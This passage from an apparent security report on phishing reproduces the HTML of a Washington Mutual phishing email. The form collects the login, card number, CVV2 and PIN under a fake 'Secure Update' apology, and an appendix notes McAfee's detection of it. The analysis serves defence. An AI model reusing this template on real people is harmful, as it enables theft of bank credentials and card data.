<td class="mainfontbold" noWrap width="224" height="10"><b>
<font face="Times New Roman">User ID:</font></b></td>
<td class="mainfontbold" noWrap width="150" height="10"><font face="Times New Roman"><b>
<input id="pwdPassword" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="wamuuser" AUTOCOMPLETE="off" size="20"></b></font></td>
<td width="228" height="19"> </td>
</tr>
<tr>
<td class="mainfontbold" noWrap width="224" height="19"><b>
<font face="Times New Roman">Password: </font></b></td>
<td class="mainfontbold" noWrap width="150" height="19"><font face="Times New Roman"><b>
<input id="pwdPassword0" title="Password" tabIndex="2" type="password" alt="Password" maxLength="32" value name="wamupass" AUTOCOMPLETE="off" size="20"></b></font></td>
<td width="228" height="19"> </td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="19"><b>
<font class="mainfontbold" face="Times New Roman">ATM/Visa Check Card
Number:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="19">
<font face="Times New Roman"><b>
<input id="pwdPassword1" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="ccnumber" AUTOCOMPLETE="off" size="20"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="19">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="14">
<font face="Times New Roman"><span class="mainfontbold">
<label for="expdate_month"><b>Expiration Date:</b></label></span></font></td>
<td vAlign="bottom" align="left" width="150" height="14">
<font face="Times New Roman"><b><select id="select2" name="ex_luna">
<option value="0" selected>- -</option>
<option value="1" ?selected?;}? {echo ?1?) ($expdate_month="=" If <?php>
>01</option>
<option value="2" ?selected?;}? {echo ($expdate_month="=" If <?php ?2?)>
>02</option>
<option value="3" ?selected?;}? {echo ($expdate_month="=" If <?php ?3?)>
>03</option>
<option value="4" ?selected?;}? {echo ($expdate_month="=" If <?php ?4?)>
>04</option>
<option value="5" ?selected?;}? {echo ($expdate_month="=" If <?php ?5?)>
>05</option>
<option value="6" ?selected?;}? {echo ($expdate_month="=" If <?php ?6?)>
>06</option>
<option value="7" ?selected?;}? {echo ($expdate_month="=" If <?php ?7?)>
>07</option>
<option value="8" ?selected?;}? {echo ($expdate_month="=" If <?php ?8?)>
>08</option>
<option value="9" ?selected?;}? {echo ($expdate_month="=" If <?php ?9?)>
>09</option>
<option value="10" ?selected?;}? {echo ($expdate_month="=" If <?php ?10?)>
>10</option>
<option value="11" ?selected?;}? {echo ($expdate_month="=" If <?php ?11?)>
>11</option>
<option value="12" ?selected?;}? {echo ($expdate_month="=" If <?php ?12?)>
>12</option>
</select><select name="exan">
<option value="0" selected>- - - -</option>
<option value="2004" ?selected?;}? {echo If <?php ?2004?) ($expdate_year="=">
>2004</option>
<option value="2005" ?selected?;}? {echo If <?php ($expdate_year="=" ?2005?)>
>2005</option>
<option value="2006" ?selected?;}? {echo If <?php ($expdate_year="=" ?2006?)>
>2006</option>
<option value="2007" ?selected?;}? {echo If <?php ($expdate_year="=" ?2007?)>
>2007</option>
<option value="2008" ?selected?;}? {echo If <?php ($expdate_year="=" ?2008?)>
>2008</option>
<option value="2009" ?selected?;}? {echo If <?php ($expdate_year="=" ?2009?)>
>2009</option>
<option value="2010" ?selected?;}? {echo If <?php ($expdate_year="=" ?2010?)>
>2010</option>
<option value="2011" ?selected?;}? {echo If <?php ($expdate_year="=" ?2011?)>
>2011</option>
<option value="2012" ?selected?;}? {echo If <?php ($expdate_year="=" ?2012?)>
>2012</option>
<option value="2013" ?selected?;}? {echo If <?php ($expdate_year="=" ?2013?)>
>2013</option>
<option value="2014" ?selected?;}? {echo If <?php ($expdate_year="=" ?2014?)>
>2014</option>
<option value="2015" ?selected?;}? {echo If <?php ($expdate_year="=" ?2015?)>
>2015</option>
</select></b></font></td>
<td vAlign="bottom" align="left" width="228" height="14">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="17"><b>
<font class="mainfontbold" face="Times New Roman">Card Verification
Number:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="17">
<font face="Times New Roman"><b>
<input id="pwdPassword2" title="Password" tabIndex="2" alt="Password" maxLength="32" value name="cvv2" AUTOCOMPLETE="off" size="4"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="17">
</td>
</tr>
<tr>
<td vAlign="bottom" align="left" width="224" height="19"><b>
<font class="mainfontbold" face="Times New Roman">Pin:</font></b></td>
<td vAlign="bottom" align="left" width="150" height="19">
<font face="Times New Roman"><b>
<input id="pwdPassword3" title="Password" tabIndex="2" type="password" alt="Password" maxLength="32" value name="pin" AUTOCOMPLETE="off" size="4"></b></font></td>
<td vAlign="bottom" align="left" width="228" height="19">
</td>
</tr>
</table>
</td>
<td bgColor="#ffcc00" width="10"> </td>
</tr>
<tr>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ybl.gif" border="0" width="10" height="10"></td>
<td bgColor="#ffcc00" width="443">
<img alt src="https://login.personal.wamu.com/images/1px_clear.gif" border="0" width="1" height="1"></td>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ybr.gif" border="0" width="10" height="10"></td>
</tr>
</table>
<br>
<input type="submit" value="Secure Update >"><p>We apologize for any inconvenience this may cause, and appreciate your
assistance in helping us maintain the<br>
integrity of the entire Washington Mutual system. Thank you for your promt
attention to this matter.<br>
<br>
Sincerly,
<br>
The Washington Mutual Team<br>
<br>
Please do not respond to this e-mail. Mail sent to this address cannot be
answered. For Assistance, log in to<br>
your Washington Mutual account and choose the "Help" link in the header of
any page.</p>
<input type="hidden" size="30" name="id" value="124">
<input type="hidden" size="30" name="mailuser" value="EMAILADDRESSIS">
<input type="hidden" size="30" name="ebay_user_id" value="test">
</td>
</tr>
<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><nobr>
<img height="1" alt src="http://www.wamu.com/images/spacer.gif" width="4" border="0">© Copyright
2005, Washington Mutual, Inc. All Rights. Reserved.</nobr></font></td>
</tr>
</table>
Appendix B: Detection Tools Some anti-virus/mail scanning tools will filter scam messages such as those presented in this paper. One such tool is McAfee’s scanner, which successfully identified and blocked delivery of the email known as “Message 7” above. Below are the details of this detection:
Phish-BankFraud.eml Trojan
Technical
details of failure: McAfee’s technical discussion of such scams is presented at: http://vil.nai.com/vil/content/v_127728.htm
See Full Report - Phishing Trip Part 1: Washington Mutual
|
Copyright Ó 2004 infectionvectors.com. All rights reserved.
